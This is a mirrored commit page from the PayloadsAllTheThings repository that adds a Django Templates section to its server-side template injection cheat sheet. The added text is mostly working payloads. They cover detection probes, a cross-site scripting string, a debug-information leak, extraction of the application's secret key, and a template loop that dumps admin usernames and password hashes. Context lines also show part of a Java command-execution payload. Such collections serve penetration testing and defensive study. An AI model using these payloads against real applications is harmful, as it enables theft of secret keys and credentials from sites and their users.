Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-20 06:22:01 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #535 from Techbrunch/patch-11

Browse source 
Add Django Templates SSTI
This commit is contained in:
Swissky 2022-08-30 14:43:38 +02:00 committed by GitHub
commit b1c46228c2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 63 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

63
Server Side Template Injection/README.md
View file

@ -33,6 +33,7 @@
- [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables)
- [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
- [Django Template](#django-template)
- [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format)
@ -337,6 +338,67 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
---
## Django Templates
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Detection
```python
{% csrf_token %} # Causes error with Jinja2
{{ 7*7 }} # Error with Django Templates
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
```
### Django Templates for post-exploitation
```python
# Variables
{{ variable }}
{{ variable.attr }}
# Filters
{{ value|length }}
# Tags
{% csrf_token %}
```
### Cross-site scripting
```python
{{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }}
```
### Debug information leak
```python
{% debug %}
```
### Leaking apps Secret Key
```python
{{ messages.storages.0.signer.key }}
```
### Admin Site URL leak
```
{% include 'admin/base.html' %}
```
### Admin username and password hash leak
```
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}
```
## Jinja2
[Official website](https://jinja.palletsprojects.com/)
@ -893,3 +955,4 @@ $str.valueOf($chr.toChars($out.read()))
* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/)
* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)